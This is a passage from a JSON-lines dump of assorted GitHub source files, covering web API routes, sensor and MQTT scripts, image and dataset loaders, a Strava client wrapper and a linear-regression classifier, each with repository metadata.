allow_headers=[\"*\"],\n)\n\napp.include_router(base_router)\n\n\n@app.middleware(\"http\")\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers[\"X-Process-Time\"] = str(process_time)\n return response\n","repo_name":"ZotovNikita/Back_central_server","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43219981487","text":"import numpy as np\nimport rasterio as rio\nfrom .generators.generators import SimpleImageGenerator\nfrom .misc import *\n\ndef mergeDataAndTarget(data, target):\n target_1 = target.reshape(target.shape[0], 1, target.shape[1], \n target.shape[2], target.shape[3])\n data_1 = np.concatenate([data, target_1], axis=1)\n data_1 = data_1.squeeze(axis=-1)\n return data_1\n\n\ndef splitDataAndTarget(dataMergeTarget):\n data = np.expand_dims(dataMergeTarget[:, :-1, :, :], axis=-1)\n target = dataMergeTarget[:, -1, :, :]\n target = np.expand_dims(target, axis=-1)\n return (data, target)\n\n\ndef generate(dataMergeTarget, datagen):\n data_iterator = datagen.flow_from_list(x=dataMergeTarget, nframes=dataMergeTarget.shape[1])\n \n res = []\n nSamples = 100\n while nSamples > 0:\n #print(nSamples)\n res1 = data_iterator._get_batches_of_transformed_samples(np.arange(dataMergeTarget.shape[0]))\n res.append(res1)\n nSamples -= 1\n return np.vstack(res)\n\n\ndef checkImageSize(imgPath, crop_size):\n with rio.open(imgPath) as src:\n img = src.read(1)\n return (img.shape[0] >= 2*crop_size and img.shape[1] >= 2*crop_size)\n return False\n\n\ndef augmentationOneReservoir(reservoirIndex, dataDir='MOD13Q1', \n bandsUse=['NIR'], timeSteps=7,\n crop_size=20, random_crop=True):\n # Create data file if not created yet\n listTestFiles = createFileData(dataDir=dataDir, reservoirsUse=[reservoirIndex], \n bandsUse=bandsUse, timeSteps=timeSteps)\n if not checkImageSize(listTestFiles[0], crop_size):\n return False\n\n # Load data\n reduceSize = None\n #reduceSize = (40,40)\n if not os.path.isdir(os.path.join('data', str(reservoirIndex), str(timeSteps))):\n os.makedirs(os.path.join('data', str(reservoirIndex), str(timeSteps)))\n (train_data, train_target) = get_data('train', reservoirIndex, timeSteps, \n reduceSize=reduceSize)\n (val_data, val_target) = get_data('val', reservoirIndex, timeSteps, \n reduceSize=reduceSize)\n (test_data, test_target) = get_data('test', reservoirIndex, timeSteps, \n reduceSize=reduceSize)\n\n train_merged = mergeDataAndTarget(train_data, train_target)\n val_merged = mergeDataAndTarget(val_data, val_target)\n test_merged = mergeDataAndTarget(test_data, test_target)\n \n datagen = SimpleImageGenerator(crop_size=(crop_size,crop_size), random_crop=random_crop)\n train = generate(train_merged, datagen)\n val = generate(val_merged, datagen)\n test = generate(test_merged, datagen)\n\n train_data_augment, train_target_augment = splitDataAndTarget(train)\n val_data_augment, val_target_augment = splitDataAndTarget(val)\n test_data_augment, test_target_augment = splitDataAndTarget(test)\n\n data_augment_path_prefix = os.path.join('data_augment', str(reservoirIndex), str(timeSteps))\n if not os.path.isdir(data_augment_path_prefix):\n os.makedirs(data_augment_path_prefix)\n train_path = os.path.join(data_augment_path_prefix, 'train.dat')\n val_path = os.path.join(data_augment_path_prefix, 'val.dat')\n test_path 
= os.path.join(data_augment_path_prefix, 'test.dat')\n\n cache_data((train_data_augment, train_target_augment), train_path)\n cache_data((val_data_augment, val_target_augment), val_path)\n cache_data((test_data_augment, test_target_augment), test_path)\n\n return True\n","repo_name":"Hydroviet/Modis","sub_path":"ModisUtils/modis_generator.py","file_name":"modis_generator.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12340198985","text":"\"\"\"Expense Transaction URLs\"\"\"\nfrom django.conf.urls import url\n\nfrom .views import dashboard, add, edit, delete\n\napp_name = \"bank_institutions\"\n\nurlpatterns = [\n url(r\"^institution/add/$\", add, name=\"add\"),\n url(r\"^institution/edit/(?P<institution_id>\\d+)$\", edit, name=\"edit\"),\n url(r\"^institution/delete/(?P<institution_id>\\d+)$\", delete, name=\"delete\"),\n url(r\"^$\", dashboard, name=\"dashboard\"),\n]\n","repo_name":"studybuffalo/treasurer_tools","sub_path":"treasurer_tools/bank_institutions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73008062593","text":"from flask import request\r\nfrom flask.helpers import make_response\r\nfrom flask_restx import Namespace, Resource, fields\r\nfrom src.repositories import UserRepository as Repository #change this\r\nimport os\r\n\r\nresource_name = \"user\" #change this\r\nresource_title = resource_name.replace('-',' ').title()\r\napi = Namespace(resource_name, description=f'{resource_title} related operations')\r\n\r\napi_field = api.model(resource_title, { #change this\r\n 'place_of_birth': fields.String(required=False, description=f'place_of_birth {resource_name}'),\r\n 'date_of_birth': fields.String(required=False, description=f'date_of_birth {resource_name}'),\r\n 'phone': fields.String(required=False, description=f'phone {resource_name}'),\r\n 'home_address': fields.String(required=False, description=f'home_address {resource_name}'),\r\n 'email': fields.String(required=True, description=f'email {resource_name}'),\r\n 'first_name': fields.String(required=True, description=f'first_name {resource_name}'),\r\n 'last_name': fields.String(required=True, description=f'last_name {resource_name}'),\r\n 'password': fields.String(required=True, description=f'password {resource_name}'),\r\n 'is_admin': fields.String(required=True, description=f'is_admin {resource_name}'),\r\n\r\n 'is_active' : fields.Boolean(required=True, description=f'is_active for {resource_name}'),\r\n 'is_delete' : fields.Boolean(required=False, description=f'is_delete for {resource_name}', default=False),\r\n 'created_by' : fields.String(required=False, description=f'created_by for {resource_name}')\r\n})\r\n\r\n@api.route('')\r\nclass Module(Resource): #change this\r\n @api.doc(params={'page': 'Page ', 'pageSize': 'Size data per page', 'is_delete': 'Filter Delete data'})\r\n def get(self):\r\n data_list = Repository.list(request)\r\n return data_list, data_list['code']\r\n\r\n @api.expect(api_field)\r\n def post(self):\r\n data_create = Repository.create(request)\r\n return data_create, data_create['code']\r\n\r\n@api.route('/<id>')\r\nclass ModuleWithId(Resource): \r\n @api.expect(api_field)\r\n def put(self, id): \r\n data_update = Repository.edit(id, request)\r\n return data_update, data_update['code']\r\n \r\n def get(self, id):\r\n data_show = Repository.show(id)\r\n return data_show, 
data_show['code']\r\n\r\n def delete(self, id):\r\n data_delete = Repository.remove(id)\r\n return data_delete, data_delete['code']\r\n\r\n","repo_name":"yosiasm/Flask-Framework","sub_path":"src/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34870162176","text":"import os.path\nfrom pprint import pprint\nfrom unittest import TestCase\n\nfrom pyfaidx import Fasta\n\nfrom tasks.eva_2950.split_rs_with_inconsistent_ss import leftnorm, parse_eva2850_diagnositc_log, process_diagnostic_log\n\n\nclass TestNormalisation(TestCase):\n\n test_dir = os.path.dirname(__file__)\n\n def test_leftnorm(self):\n fasta_file = os.path.join(self.test_dir, 'fasta_file.fa')\n # Based on rs54131737\n fa = Fasta(fasta_file, as_raw=True, read_ahead=40000)\n chrom = 'AP014957.1'\n pos = 91\n ref = ''\n alt = 'TTTTT'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CTTTTT')\n pos = 81\n ref = ''\n alt = 'TTTTT'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CTTTTT')\n pos = 81\n ref = ''\n alt = 'T'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CT')\n pos = 91\n ref = ''\n alt = 'T'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CT')\n\n\nclass TestSplitRS(TestCase):\n\n test_dir = os.path.dirname(__file__)\n\n def test_parse_eva2850_diagnositc_log(self):\n diagnostic_file = os.path.join(self.test_dir, 'diagnostic_output_log.out')\n rsids = []\n lists_of_ssids = []\n for rsid, list_of_ssids in parse_eva2850_diagnositc_log(diagnostic_file):\n rsids.append(rsid)\n lists_of_ssids.append(list_of_ssids)\n\n assert [l['accession'] for list_of_ssids in lists_of_ssids for l in list_of_ssids] == [\n 71656146, 1961656906, 73429405, 71656146, 73429405, 73630724, 73526101, 1965862538, 73630724, 73526101,\n 1964358410, 73565740, 1964358413, 73565740\n ]\n assert rsids == [54131737, 53378121, 54319631]\n\n def test_process_diagnostic_log(self):\n diagnostic_file = os.path.join(self.test_dir, 'diagnostic_output_log.out')\n ref_genome_dir = os.path.join(self.test_dir, 'references')\n\n process_diagnostic_log(diagnostic_file, ref_genome_dir)\n","repo_name":"EBIvariation/eva-tasks","sub_path":"tasks/eva_2950/tests/test_split_rs_with_inconsistent_ss.py","file_name":"test_split_rs_with_inconsistent_ss.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72853804034","text":"\r\nfrom keras.utils.np_utils import to_categorical\r\nimport pandas as pd\r\npd.set_option('mode.chained_assignment', None)\r\nimport numpy as np\r\nimport random\r\n\r\n\r\noriginal_facial_expression = {'Angry': 0,'Disgust': 1, 'Fear': 2, 'Happy': 3, 'Sad': 4, 'Surprise': 5,'Neutral': 6};\r\nfinal_facial_expresion = ['Angry','Disgust','Fear','Happy','Sad','Surprise','Neutral'];\r\n\r\n\r\ndef fnReconstruct(original_pixels, size=(48,48)):\r\n original_pixels = np.array(list(map(int, original_pixels.split())))\r\n return original_pixels.reshape(size)\r\n\r\ndef fnGetEmotionCount(y_private, classes, verbose=True):\r\n emo_classcount = {}\r\n for new_num, _class in enumerate(classes):\r\n y_private.loc[(y_private == original_facial_expression[_class])] = new_num\r\n class_count = sum(y_private == (new_num))\r\n if verbose:\r\n print('{}: {} with {} samples'.format(new_num, _class, class_count))\r\n emo_classcount[_class] = (new_num, class_count)\r\n return 
y_private.values, emo_classcount\r\n \r\n \r\ndef fnLoadData(Sample_split_fraction=0.3, usage='PrivateTest', boolCategorize=True, verbose=True,\r\ndefault_classes=['Angry', 'Happy'], filepath='data/fer2013.csv'):\r\n \r\n df = pd.read_csv(filepath)\r\n df = df[df.Usage == usage]\r\n frames = []\r\n for _class in default_classes:\r\n class_df = df[df['emotion'] == original_facial_expression[_class]]\r\n frames.append(class_df)\r\n data = pd.concat(frames, axis=0)\r\n rows = random.sample(list(data.index), int(len(data) * Sample_split_fraction))\r\n data = data.loc[rows]\r\n print ('{} set for {}: {}'.format(usage, default_classes, data.shape))\r\n data['pixels'] = data.pixels.apply(lambda x: fnReconstruct(x))\r\n x = np.array([mat for mat in data.pixels])\r\n X_private = x.reshape(-1, 1, x.shape[1], x.shape[2])\r\n Y_private, new_dict = fnGetEmotionCount(data.emotion, default_classes, verbose)\r\n print (new_dict)\r\n if boolCategorize:\r\n Y_private = to_categorical(Y_private)\r\n return X_private, Y_private, new_dict\r\n\r\n\r\n\r\ndef fnSaveData(X_private, Y_private, fname='', folder='data/'):\r\n np.save(folder + 'X_private' + fname, X_private)\r\n np.save(folder + 'Y_private' + fname, Y_private)\r\n \r\n \r\nif __name__ == '__main__':\r\n # makes the numpy arrays ready to use:\r\n print ('Making moves...')\r\n final_facial_expresion = ['Angry','Disgust','Fear','Happy','Sad','Surprise','Neutral']\r\n\r\n X_private, Y_private, emo_dict = fnLoadData(Sample_split_fraction=1.0,\r\n default_classes=final_facial_expresion,\r\n usage='PrivateTest',\r\n verbose=True)\r\n print ('Saving...')\r\n fnSaveData(X_private, Y_private, fname='_test')\r\n print (X_private.shape)\r\n print (Y_private.shape)\r\n print ('Done!')","repo_name":"Amir22010/deep","sub_path":"fer2013DataGenerator.py","file_name":"fer2013DataGenerator.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22551573489","text":"#!/usr/bin/env python3\nfrom smbus2 import SMBus\nfrom ctypes import c_int8\nfrom sensor_msgs.msg import Imu\n\nimport signal, time, rospy\n\ndef keyboardInterruptHandler(signal,frame):\n print('Interrupted!')\n exit(0)\n\nsignal.signal(signal.SIGINT,keyboardInterruptHandler)\n\ndef Setup(ADXL375_DEVICE,OFSX,OFSY,OFSZ):\n #Power on ADXL375\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_POWER_CTL,0) #Standby during setup\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_BW_RATE, 9) #50Hz\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_FIFO_CTL, 0) #Bypass\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_POWER_CTL,8) #Setup finished - enter measuring mode\n \n\n #Set offset variables found through calibration script\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_OFSX, OFSX)\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_OFSY, OFSY)\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_OFSZ, OFSZ)\n\ndef ReadAxes(ADXL375_DEVICE):\n block = bus.read_i2c_block_data(ADXL375_DEVICE,ADXL375_DATAX0,6)\n x_raw = c_int8(block[0]).value | c_int8(block[1]).value << 8\n x = x_raw/20.5\n y_raw = c_int8(block[2]).value | c_int8(block[3]).value << 8\n y = y_raw/20.5\n z_raw = c_int8(block[4]).value | c_int8(block[5]).value << 8\n z = z_raw/20.5\n #print(x_raw)\n return(x,y,z)\n\n#I2C channel\ni2c_ch = 0\n\n#Device address\nADXL375_DEVICE1 = 0x53\nADXL375_DEVICE2 = 0x1D\n\n#Register addresses\nADXL375_POWER_CTL = 0x2D\nADXL375_BW_RATE = 0x2C\nADXL375_FIFO_CTL = 0x38\nADXL375_DATAX0 = 0x32\nADXL375_OFSX = 0x1E\nADXL375_OFSY = 0x1F\nADXL375_OFSZ = 
0x20\n\n#Initialize I2C (SMBus)\nbus = SMBus(i2c_ch)\n\n#Startup\nSetup(ADXL375_DEVICE1,-1,2,1)\n#Setup(ADXL375_DEVICE2,0,-2,-1)\n\nif __name__ == '__main__':\n pub1 = rospy.Publisher('ADXL375/Accel1', Imu, queue_size=10)\n pub2= rospy.Publisher('ADXL375/Accel2', Imu, queue_size=10)\n rospy.init_node('ADXL375', anonymous=True)\n rate = rospy.Rate(2000) #50hz\n data1 = Imu()\n data2 = Imu()\n\n while True:\n [x1,y1,z1] = ReadAxes(ADXL375_DEVICE1)\n #[x2,y2,z2] = ReadAxes(ADXL375_DEVICE2)\n [x2,y2,z2] = [1,2,3]\n\n data1.linear_acceleration.x = x1\n data1.linear_acceleration.y = y1\n data1.linear_acceleration.z = z1\n\n data2.linear_acceleration.x = x2\n data2.linear_acceleration.y = y2\n data2.linear_acceleration.z = z2\n\n pub1.publish(data1)\n pub2.publish(data2)\n rate.sleep()\n","repo_name":"MichaelJNielsen/adxl375_rosinterface","sub_path":"scripts/ADXL375_rospub.py","file_name":"ADXL375_rospub.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5547836133","text":"# program menyimpan data peminjaman buku\r\n\r\ndataFile = open('PinjamBuku.txt', 'a')\r\n\r\nfrom datetime import *\r\n\r\n#membaca tangal sekarang\r\nskrg = datetime.date(datetime.now())\r\n\r\n#tanggal maksimal pengembalian\r\nkembali = skrg + timedelta(days=7)\r\n\r\ntglskrg = str(skrg)\r\ntglkembali = str(kembali)\r\n\r\nwhile True:\r\n kode = input('Masukkan Kode Member: ')\r\n nama = input('Masukkan Nama Member: ')\r\n judul = input('Masukkan Judul Buku: ')\r\n \r\n myString = kode+'|'+nama+'|'+judul+'|'+tglskrg+'|'+tglkembali+'\\n'\r\n dataFile.write(myString)\r\n ans = input('Ulangi lagi (y/n): ')\r\n if ans in ('N', 'n'):\r\n break\r\n \r\ndataFile.close()\r\n","repo_name":"sukmalarasati/Pemograman-Terstruktur","sub_path":"Chapter 11/Python Project 2.py","file_name":"Python Project 2.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13186938422","text":"import os\nfrom random import sample\nfrom math import floor\n\nimg_paths = os.listdir(\"./images\")\n\nvalidation_paths = sample(img_paths, floor(len(img_paths)*0.2))\ntraining_paths = [path for path in img_paths if path not in validation_paths]\n\nwith open(\"train.txt\", \"w\") as f:\n f.write(\"\\n\".join(f\"./images/{path}\" for path in training_paths))\n\nwith open(\"validation.txt\", \"w\") as f:\n f.write(\"\\n\".join(f\"./images/{path}\" for path in validation_paths))\n","repo_name":"AscendNTNU/startup-per24-data","sub_path":"data/fusion/gen_train_validation.py","file_name":"gen_train_validation.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72720646915","text":"import subprocess\nfrom subprocess import call\nimport paho.mqtt.client as mqtt\nimport os\n# This is the Subscriber\n\ndef on_connect(client, userdata, flags, rc):\n  print(\"Connected with result code \"+str(rc))\n  client.subscribe(\"test\")\n\ndef on_message(client, userdata, msg):\n    if msg.payload.decode() == \"1\":\n        os.system(\"/home/pi/cam.py\")\n        client.disconnect()\n\nclient = mqtt.Client()\nclient.connect(\"10.71.56.173\",1883,60)\n\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.loop_forever()\n","repo_name":"Uelimueli/W902","sub_path":"mos_sub.py","file_name":"mos_sub.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"70083786116","text":"import collections\nimport datetime\nimport logging\nimport stravalib.client\nimport time\n\nlogger = logging.getLogger('strava-client')\nlogger.setLevel(logging.DEBUG)\n\nclass BaseException(Exception):\n pass\n\nclass ConfigError(BaseException):\n pass\n\nclass MyStravaClient(stravalib.client.Client):\n\n API_CALL_PAUSE_SECONDS = 1.5 # 40 requests per minute\n\n def get_all_gears(self):\n all_activities = self.get_activities()\n uniq_gear_ids = filter(None, set(activity.gear_id for activity in all_activities))\n gears = []\n for gear_id in uniq_gear_ids:\n time.sleep(self.API_CALL_PAUSE_SECONDS)\n gears.append(self.get_gear(gear_id))\n return gears\n\n def get_activities(self, before=None, after=None, limit=None):\n return list(stravalib.client.Client.get_activities(self, before=before, after=after, limit=limit))\n\n def get_activities_since(self, year, month, day, filter_types=['Ride']):\n start_date = datetime.datetime(year, month, day, 0, 0)\n matches = []\n activities_list = self.get_activities(after=start_date)\n for activity in activities_list:\n if activity.type in filter_types:\n matches.append(activity)\n return matches\n\n def get_activities_current_month(self, filter_types=['Ride']):\n # get first date of current month\n now = datetime.datetime.now()\n return self.get_activities_since(now.year, now.month, 1, filter_types=filter_types)\n\n def batch_set_privacy(self, activity_ids, private=True):\n updated_ids = []\n for each in activity_ids:\n try:\n logger.debug('Setting {id!s} privacy to {p!r}'.format(id=each, p=private))\n self.update_activity(each, private=private)\n except TypeError:\n # workaround for a bug in stravalib: Rate Limit errors are raised as \"TypeError: a float is required\"\n time.sleep(15) # naively cool down for 15 seconds, this works pretty well, implement exponential back-off later\n time.sleep(self.API_CALL_PAUSE_SECONDS)\n updated_ids.append(each)\n return updated_ids\n\n def batch_toggle_privacy(self, activity_ids):\n updated = self.batch_set_privacy(activity_ids, private=False)\n if raw_input('Toggle {n} activities back to private? 
y/n > '.format(n=len(updated))).lower() == 'y':\n            updated = self.batch_set_privacy(updated, private=True)\n        return updated\n\ndef summarize_gear_usage(activity_list):\n    gear_usage_count_lookup = collections.defaultdict(int)\n    gear_distance_lookup = collections.defaultdict(float)\n    for activity in activity_list:\n        gear_usage_count_lookup[activity.gear_id] += 1\n        gear_distance_lookup[activity.gear_id] += activity.distance.get_num()\n    return dict(gear_usage_count_lookup), dict(gear_distance_lookup)\n\n\ndef summarize(activities_list, short_ride_threshold=5.0):\n    summary = {\n        'distance': 0.0,\n        'count_public': 0,\n        'distance_public': 0.0,\n        'distance_private': 0.0,\n        'private_ids': [],\n        'commute_ids': [],\n        'short_rides_ids': []\n    }\n    for activity in activities_list:\n        summary['distance'] += activity.distance.get_num()\n        activity_distance = activity.distance.get_num()\n        if activity.private:\n            summary['distance_private'] += activity_distance\n            summary['private_ids'].append(activity.id)\n        else:\n            summary['count_public'] += 1\n            summary['distance_public'] += activity_distance\n\n        if (activity_distance / 1000.0) < short_ride_threshold:\n            summary['short_rides_ids'].append(activity.id)\n\n        if activity.commute:\n            summary['commute_ids'].append(activity.id)\n    # convert to kms\n    for k in summary:\n        if k.startswith('distance'):\n            summary[k] = round(summary[k] / 1000.0, 1)\n    summary['count_private'] = len(summary['private_ids'])\n    summary['count_commute'] = len(summary['commute_ids'])\n    return summary\n\n","repo_name":"anthonywu/strava-api-experiment","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"35834677884","text":"import random\r\nimport time\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass LR():\r\n    def __init__(self, a_train, b_train, a_test, b_test, method):\r\n        self.start_time = 0\r\n        self.end_time = 0\r\n        self.start_time = time.time()\r\n        self.accu_train = 0\r\n        self.accu_test = 0\r\n\r\n        if method == 'Linear Regression':\r\n            self.X_mat = np.mat([0, 0, 0])  # 矩阵初始化\r\n            for a in a_train:\r\n                self.X_mat = np.r_[self.X_mat, np.mat([a['x1'], a['x2'], a['bias']])]  # 行扩展\r\n            for b in b_train:\r\n                self.X_mat = np.r_[self.X_mat, np.mat([b['x1'], b['x2'], b['bias']])]  # 行扩展\r\n            self.X_mat = np.delete(self.X_mat, 0, 0)  # 删除第一行\r\n            print(self.X_mat)  # 输出矩阵\r\n\r\n            self.Y_mat = np.mat([0])  # 矩阵初始化\r\n            for a in a_train:\r\n                self.Y_mat = np.r_[self.Y_mat, np.mat(a['y'])]  # 行扩展\r\n            for b in b_train:\r\n                self.Y_mat = np.r_[self.Y_mat, np.mat(b['y'])]  # 行扩展\r\n            self.Y_mat = np.delete(self.Y_mat, 0, 0)  # 删除第一行\r\n\r\n            self.X_T__X = self.X_mat.T * self.X_mat\r\n            self.X_generalized_inverse = self.X_T__X.I * self.X_mat.T  # 得到广义逆\r\n\r\n            self.best_w_mat = self.X_generalized_inverse * self.Y_mat\r\n            self.best_w = self.best_w_mat.tolist()\r\n            self.best_w[0] = self.best_w[0][0]\r\n            self.best_w[1] = self.best_w[1][0]\r\n            self.best_w[2] = self.best_w[2][0]\r\n\r\n            print('The X_generalized_inverse is ' + str(self.X_generalized_inverse))\r\n\r\n            print('The best w is ' + str(self.best_w))\r\n            self.judge(a_train, b_train)\r\n\r\n        if method == 'gradient descent':\r\n            self.epoch = 1000  # 整个样本集遍历多少次\r\n            self.batch = 400  # batch的大小,因为我们的训练样本集大小为320,所以batch大小应该是320的因子\r\n            self.yita = 0.01  # 学习步长\r\n            self.loss_list = []\r\n            self.w = self.initialize_w(a_train, b_train)\r\n            self.best_w = self.w.copy()\r\n            self.gradient_descent_train(a_train, b_train)\r\n            print('the final w is 
' + str(self.best_w))\r\n self.judge(a_train, b_train)\r\n\r\n self.draw_train(a_train, b_train, method)\r\n # self.test(a_test, b_test)\r\n\r\n def initialize_w(self, a_train, b_train):\r\n '''\r\n 随机生成101个w,取其中损失函数最小的作为初始化的w\r\n :param a_train:\r\n :param b_train:\r\n :return:\r\n '''\r\n w = [0, 0, 0]\r\n w[0] = random.uniform(-100, 100)\r\n w[1] = random.uniform(-100, 100)\r\n w[2] = random.uniform(-100, 100)\r\n train = a_train.copy() + b_train.copy()\r\n best_initialize_Lin = 0\r\n for t in train:\r\n best_initialize_Lin += (w[0] * t['x1'] + w[1] * t['x2'] + w[2] * t['bias'] - t['y']) ** 2\r\n best_initialize_Lin = best_initialize_Lin / len(train)\r\n\r\n best_initialize_w = w.copy()\r\n for i in range(100):\r\n w[0] = random.uniform(-100, 100)\r\n w[1] = random.uniform(-100, 100)\r\n w[2] = random.uniform(-100, 100)\r\n initialize_Lin = 0\r\n for t in train:\r\n initialize_Lin = initialize_Lin + (w[0] * t['x1'] + w[1] * t['x2'] + w[2] * t['bias'] - t['y']) ** 2\r\n initialize_Lin = initialize_Lin / len(train)\r\n if initialize_Lin < best_initialize_Lin:\r\n best_initialize_Lin = initialize_Lin\r\n best_initialize_w = w.copy()\r\n print('now w ' + str(w))\r\n print('best w ' + str(best_initialize_w))\r\n print(' ')\r\n return best_initialize_w\r\n\r\n def gradient_descent_train(self, a_train, b_train):\r\n train = a_train.copy() + b_train.copy()\r\n for i in range(self.epoch): # 将整个数据集遍历多少次\r\n random.shuffle(train)\r\n loss = 0\r\n for j in range(int(each_train_num / self.batch)): # 在每一次数据集的遍历中,对每一个batch进行循环\r\n grad_Lin = [0, 0, 0]\r\n for k in range(self.batch): # 处理每个batch中的样本,即迭代一次w\r\n grad_Lin[0] += (self.w[0] * train[j * self.batch + k]['x1'] + self.w[1] * train[j * self.batch + k][\r\n 'x2'] + self.w[2] * train[j * self.batch + k]['bias'] - train[j * self.batch + k]['y']) * \\\r\n train[j * self.batch + k]['x1']\r\n\r\n grad_Lin[1] += (self.w[0] * train[j * self.batch + k]['x1'] + self.w[1] * train[j * self.batch + k][\r\n 'x2'] + self.w[2] * train[j * self.batch + k]['bias'] - train[j * self.batch + k]['y']) * \\\r\n train[j * self.batch + k]['x2']\r\n\r\n grad_Lin[2] += (self.w[0] * train[j * self.batch + k]['x1'] + self.w[1] * train[j * self.batch + k][\r\n 'x2'] + self.w[2] * train[j * self.batch + k]['bias'] - train[j * self.batch + k]['y']) * \\\r\n train[j * self.batch + k]['bias']\r\n grad_Lin[0] = grad_Lin[0] * 2 / self.batch\r\n grad_Lin[1] = grad_Lin[1] * 2 / self.batch\r\n grad_Lin[2] = grad_Lin[2] * 2 / self.batch\r\n\r\n self.w[0] = self.w[0] - self.yita * grad_Lin[0]\r\n self.w[1] = self.w[1] - self.yita * grad_Lin[1]\r\n self.w[2] = self.w[2] - self.yita * grad_Lin[2]\r\n for t in train:\r\n loss += (self.w[0] * t['x1'] + self.w[1] * t['x2'] + self.w[2] * t['bias'] - t['y']) ** 2\r\n\r\n self.loss_list.append(loss)\r\n self.best_w = self.w.copy()\r\n\r\n def judge(self, a_train, b_train):\r\n '''\r\n 用于判断训练集中哪些样本分类正确和分类错误,并且计算总的正确率\r\n :param a_train:\r\n :param b_train:\r\n :return:\r\n '''\r\n self.accu_train = len(a_train) + len(b_train)\r\n for i in range(0, len(a_train)):\r\n t = a_train[i]['x1'] * self.best_w[0] + a_train[i]['x2'] * self.best_w[1] + a_train[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n a_train[i]['y_'] = 1\r\n elif t < 0:\r\n a_train[i]['y_'] = -1\r\n else:\r\n a_train[i]['y_'] = 0\r\n\r\n if a_train[i]['y'] != a_train[i]['y_']:\r\n self.accu_train = self.accu_train - 1\r\n\r\n for i in range(0, len(b_train)):\r\n t = b_train[i]['x1'] * self.best_w[0] + b_train[i]['x2'] * self.best_w[1] + b_train[i]['bias'] * \\\r\n 
self.best_w[2]\r\n if t > 0:\r\n b_train[i]['y_'] = 1\r\n elif t < 0:\r\n b_train[i]['y_'] = -1\r\n else:\r\n b_train[i]['y_'] = 0\r\n\r\n if b_train[i]['y'] != b_train[i]['y_']:\r\n self.accu_train = self.accu_train - 1\r\n\r\n def draw_train(self, a_train, b_train, method):\r\n '''\r\n 将训练样本在2维图中画出来,并且把最佳分类面画出来,输出最佳分类面在训练数据集中的最佳正确率\r\n :param a_train:\r\n :param b_train:\r\n :return:\r\n '''\r\n if method == 'gradient descent':\r\n plt.figure()\r\n plt.plot(range(self.epoch), self.loss_list)\r\n plt.xlabel(\"epoch\", fontdict = {'size': 16})\r\n plt.ylabel(\"Lin\", fontdict = {'size': 16})\r\n\r\n plt.figure()\r\n for a in a_train:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 1, label = 'a')\r\n for b in b_train:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 1, label = 'b')\r\n\r\n plt.plot([-5, 5], [-(self.best_w[0] * (-5) + self.best_w[2]) / self.best_w[1],\r\n -(self.best_w[0] * 5 + self.best_w[2]) / self.best_w[1]],\r\n c = 'green')\r\n\r\n plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n print('The best accuracy in the training is ' + str(self.accu_train / each_train_num / 2))\r\n plt.show()\r\n\r\n def test(self, a_test, b_test):\r\n '''\r\n 检测训练出来的最佳分类面在测试数据集上的正确率,并找出哪些样本分类正确,哪些样本分类错误,最后调用画图函数在二维图中画出测试样本的位置\r\n :param a_test:\r\n :param b_test:\r\n :return:\r\n '''\r\n self.accu_test = len(a_test) + len(b_test)\r\n for i in range(0, len(a_test)):\r\n t = a_test[i]['x1'] * self.best_w[0] + a_test[i]['x2'] * self.best_w[1] + a_test[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n a_test[i]['y_'] = 1\r\n elif t < 0:\r\n a_test[i]['y_'] = -1\r\n else:\r\n a_test[i]['y_'] = 0\r\n\r\n if a_test[i]['y'] != a_test[i]['y_']:\r\n self.accu_test = self.accu_test - 1\r\n\r\n for i in range(0, len(b_test)):\r\n t = b_test[i]['x1'] * self.best_w[0] + b_test[i]['x2'] * self.best_w[1] + b_test[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n b_test[i]['y_'] = 1\r\n 